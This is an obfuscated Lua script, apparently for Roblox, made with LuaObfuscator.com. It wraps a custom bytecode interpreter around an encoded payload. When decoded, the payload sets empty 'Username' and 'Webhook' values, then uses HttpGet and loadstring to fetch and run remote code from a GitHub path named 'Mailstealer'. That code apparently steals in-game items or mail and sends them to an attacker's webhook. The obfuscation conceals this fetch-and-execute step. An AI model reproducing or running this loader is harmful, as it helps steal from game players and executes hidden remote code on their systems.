--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v79=v2(v0(v30,16));if v19 then local v85=v5(v79,v19);v19=nil;return v85;else return v79;end end end);local function v20(v31,v32,v33)if v33 then local v80=(v31/(2^(v32-(2 -(1 + 0)))))%((5 -(880 -(282 + 595)))^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v80-(v80%(932 -(857 + 74))) ;else local v81=((2207 -(1523 + 114)) -(330 + 37 + 201))^(v32-1) ;return (((v31%(v81 + v81))>=v81) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (17 -13) ;return (v40 * 16777216) + (v39 * (65653 -(32 + 85))) + (v38 * (251 + 5)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,958 -(892 + 65) ,20) * ((4 -2)^32)) + v41 ;local v45=v20(v42,38 -17 ,(73 -17) -25 );local v46=((v20(v42,382 -(87 + 263) )==(181 -(67 + 113))) and  -(1 + 0)) or 1 ;if (v45==(0 -(1187 -(1069 + 118)))) then if (v44==0) then return v46 * (0 + 0) ;else v45=3 -2 ;v43=952 -(802 + 150) ;end elseif (v45==((12502 -6991) -(7576 -4112))) then return ((v44==0) and (v46 * ((1 -0)/(0 + 0 + 0)))) or (v46 * NaN) ;end return v8(v46,v45-(2020 -(915 + 82)) ) * (v43 + (v44/((5 -(4 -1))^(31 + 21)))) ;end local function v25(v47)local v48=0;local v49;local v50;while true do if (v48==(2 + 0)) then v50={};for v86=792 -(368 + 423) , #v49 do v50[v86]=v2(v1(v3(v49,v86,v86)));end v48=9 -6 ;end if (v48==(18 -((448 -(145 + 293)) + 8))) then v49=nil;if  not v47 then v47=v23();if (v47==(0 -(430 -(44 + 386)))) then return "";end end v48=443 -(416 + 26) ;end if (v48==(9 -6)) then return v6(v50);end if (v48==(1 + 0)) then v49=v3(v16,v18,(v18 + v47) -((1487 -(998 + 488)) -0) );v18=v18 + v47 ;v48=2;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==0) then v52=696 -(601 + 95) ;v53=nil;v51=1 -0 ;end if (v51~=(3 + 0)) then else v58=nil;while true do local v88=1384 -(746 + 638) ;local v89;while true do if (v88==0) then v89=0;while true do if (v89==(1474 -(1329 + 145))) then if (v52~=(973 -(140 + 831))) then else local v141=1850 -(1409 + 441) ;while true do if (v141==0) then for v166=719 -(15 + 703) ,v23() do local v167=0;local v168;local v169;while true do if (v167==(1 + 0)) then while true do if (v168==(438 -(262 + 176))) then v169=v21();if (v20(v169,1722 -(345 + 1376) ,1)~=0) then else local v175=688 -(198 + 490) ;local v176;local v177;local v178;local v179;while true do if ((8 -6)~=v175) then else while true do if (v176==0) then local v181=0;local v182;while true do if (v181~=(0 -0)) then else v182=1206 -(696 + 510) ;while true do if ((0 -0)~=v182) then else local v194=1262 -(1091 + 171) ;while true do if (v194~=0) then else v177=v20(v169,1583 -(1535 + 46) ,3);v178=v20(v169,4 + 0 ,6);v194=1 + 0 ;end if (v194==1) then v182=1;break;end end end if ((561 -(306 + 254))==v182) then v176=1 + 0 ;break;end end break;end end end if (v176~=3) then else if (v20(v178,3,3)~=(1 + 0)) then else v179[12 -8 ]=v58[v179[12 -8 ]];end v53[v166]=v179;break;end if (v176==(376 -(123 + 251))) then local v184=0 -0 ;while true do if (v184==1) then v176=701 -(208 + 490) ;break;end if (v184~=0) then else if (v20(v178,1 + 0 ,1 + 0 )==(837 -(660 + 176))) then v179[1 + 1 ]=v58[v179[204 -(14 + 188) ]];end if (v20(v178,2,4 -2 )==(676 -(534 + 141))) then v179[3]=v58[v179[2 + 1 ]];end v184=1 + 0 ;end end end if (v176~=1) then else local v185=0 + 0 ;while true do if (v185~=(0 -0)) then else v179={v22(),v22(),nil,nil};if (v177==(572 -(426 + 146))) then local v192=0 + 0 ;local v193;while true do if (v192==(0 + 0)) then v193=0;while true do if (v193==0) then v179[814 -(569 + 242) ]=v22();v179[400 -(115 + 281) ]=v22();break;end end break;end end elseif (v177==(2 -1)) then v179[3 + 0 ]=v23();elseif (v177==(4 -2)) then v179[10 -7 ]=v23() -((869 -(550 + 317))^(22 -6)) ;elseif (v177~=3) then else local v199=0;while true do if (v199==(1251 -(721 + 530))) then v179[3]=v23() -((2 -0)^(1287 -(945 + 326))) ;v179[4]=v22();break;end end end v185=2 -1 ;end if (1~=v185) then else v176=2 + 0 ;break;end end end end break;end if (v175==1) then v178=nil;v179=nil;v175=5 -3 ;end if (v175==(700 -(271 + 429))) then v176=0;v177=nil;v175=1 + 0 ;end end end break;end end break;end if (v167==(285 -(134 + 151))) then v168=1086 -(461 + 625) ;v169=nil;v167=1;end end end for v170=1,v23() do v54[v170-(1666 -(970 + 695)) ]=v28();end v141=1 + 0 ;end if (v141==(1 -0)) then return v56;end end end if (v52==(0 + 0)) then v53={};v54={};v55={};v56={v53,v54,nil,v55};v52=3 -2 ;end v89=1 + 0 ;end if (v89~=(1 -0)) then else if (v52~=(3 -2)) then else v57=v23();v58={};for v149=1825 -(1195 + 629) ,v57 do local v150=0 -0 ;local v151;local v152;local v153;while true do if (v150==1) then v153=nil;while true do if (v151~=(241 -(187 + 54))) then else local v172=0;local v173;while true do if (v172==(780 -(162 + 618))) then v173=0 + 0 ;while true do if ((1 + 0)~=v173) then else v151=1;break;end if (v173==(1322 -(1249 + 73))) then local v180=0 + 0 ;while true do if (v180~=(0 -0)) then else v152=v21();v153=nil;v180=1 -0 ;end if (v180==(1146 -(466 + 679))) then v173=1;break;end end end end break;end end end if (v151==(1 + 0)) then if (v152==1) then v153=v21()~=(0 -0) ;elseif (v152==(5 -3)) then v153=v24();elseif (v152==(1903 -(106 + 1794))) then v153=v25();end v58[v149]=v153;break;end end break;end if (v150==(1636 -(1373 + 263))) then v151=1000 -(451 + 549) ;v152=nil;v150=1;end end end v56[3]=v21();v52=2;end break;end end break;end end end break;end if (v51==1) then v54=nil;v55=nil;v51=1 + 1 ;end if (v51~=(1 + 1)) then else v56=nil;v57=nil;v51=4 -1 ;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=1;local v70= -1;local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v82=0,v73 do if (v82>=v67) then v71[v82-v67 ]=v72[v82 + 1 ];else v75[v82]=v72[v82 + 1 ];end end local v76=(v73-v67) + 1 ;local v77;local v78;while true do v77=v65[v69];v78=v77[1];if (v78<=5) then if (v78<=2) then if (v78<=0) then v75[v77[2]]=v77[3]~=0 ;elseif (v78>1) then v69=v77[3];else local v104=0;local v105;while true do if (v104==0) then v105=v77[2];v75[v105]=v75[v105](v13(v75,v105 + 1 ,v70));break;end end end elseif (v78<=3) then v61[v77[3]]=v75[v77[2]];elseif (v78==4) then for v117=v77[2],v77[3] do v75[v117]=nil;end else v75[v77[2]]=v77[3];end elseif (v78<=8) then if (v78<=6) then local v97=0;local v98;local v99;local v100;local v101;local v102;while true do if (v97==7) then v77=v65[v69];v102=v77[2];v75[v102]=v75[v102](v13(v75,v102 + 1 ,v70));v69=v69 + 1 ;v97=8;end if (v97==1) then v61[v77[3]]=v75[v77[2]];v69=v69 + 1 ;v77=v65[v69];if ((v77[3]=="_ENV") or (v77[3]=="getfenv")) then v75[v77[2]]=v61;else v75[v77[2]]=v61[v77[3]];end v97=2;end if (v97==2) then v69=v69 + 1 ;v77=v65[v69];if ((v77[3]=="_ENV") or (v77[3]=="getfenv")) then v75[v77[2]]=v61;else v75[v77[2]]=v61[v77[3]];end v69=v69 + 1 ;v97=3;end if (v97==5) then v69=v69 + 1 ;v77=v65[v69];v102=v77[2];v99,v100=v68(v75[v102](v13(v75,v102 + 1 ,v77[3])));v97=6;end if (v97==3) then v77=v65[v69];v102=v77[2];v101=v75[v77[3]];v75[v102 + 1 ]=v101;v97=4;end if (v97==6) then v70=(v100 + v102) -1 ;v98=0;for v143=v102,v70 do local v144=0;while true do if (0==v144) then v98=v98 + 1 ;v75[v143]=v99[v98];break;end end end v69=v69 + 1 ;v97=7;end if (v97==8) then v77=v65[v69];v75[v77[2]]();v69=v69 + 1 ;v77=v65[v69];v97=9;end if (v97==4) then v75[v102]=v101[v77[4]];v69=v69 + 1 ;v77=v65[v69];v75[v77[2]]=v77[3];v97=5;end if (v97==9) then v69=v77[3];break;end if (v97==0) then v98=nil;v99,v100=nil;v101=nil;v102=nil;v97=1;end end elseif (v78==7) then do return;end else v75[v77[2]]();end elseif (v78<=10) then if (v78>9) then local v108=v77[2];local v109=v75[v77[3]];v75[v108 + 1 ]=v109;v75[v108]=v109[v77[4]];else local v113=v77[2];local v114,v115=v68(v75[v113](v13(v75,v113 + 1 ,v77[3])));v70=(v115 + v113) -1 ;local v116=0;for v139=v113,v70 do local v140=0;while true do if (v140==0) then v116=v116 + 1 ;v75[v139]=v114[v116];break;end end end end elseif (v78==11) then if (v75[v77[2]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end elseif ((v77[3]=="_ENV") or (v77[3]=="getfenv")) then v75[v77[2]]=v61;else v75[v77[2]]=v61[v77[3]];end v69=v69 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696C737465616C657256322F4D61696C737465616C65722F6D61696E2F763203083O00557365726E616D65034O0003073O00576562682O6F6B00243O0012053O00014O0004000100013O00260B3O0002000100010004023O00020001001205000100013O00260B00010011000100020004023O001100014O000200013O001206000200033O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O0023000100260B00010005000100010004023O00050001001205000200013O00260B0002001B000100010004023O001B0001001205000300093O001203000300083O001205000300093O0012030003000A3O001205000200023O00260B00020014000100020004023O00140001001205000100023O0004023O000500010004023O001400010004023O000500010004023O002300010004023O000200012O00073O00017O00",v9(),...);
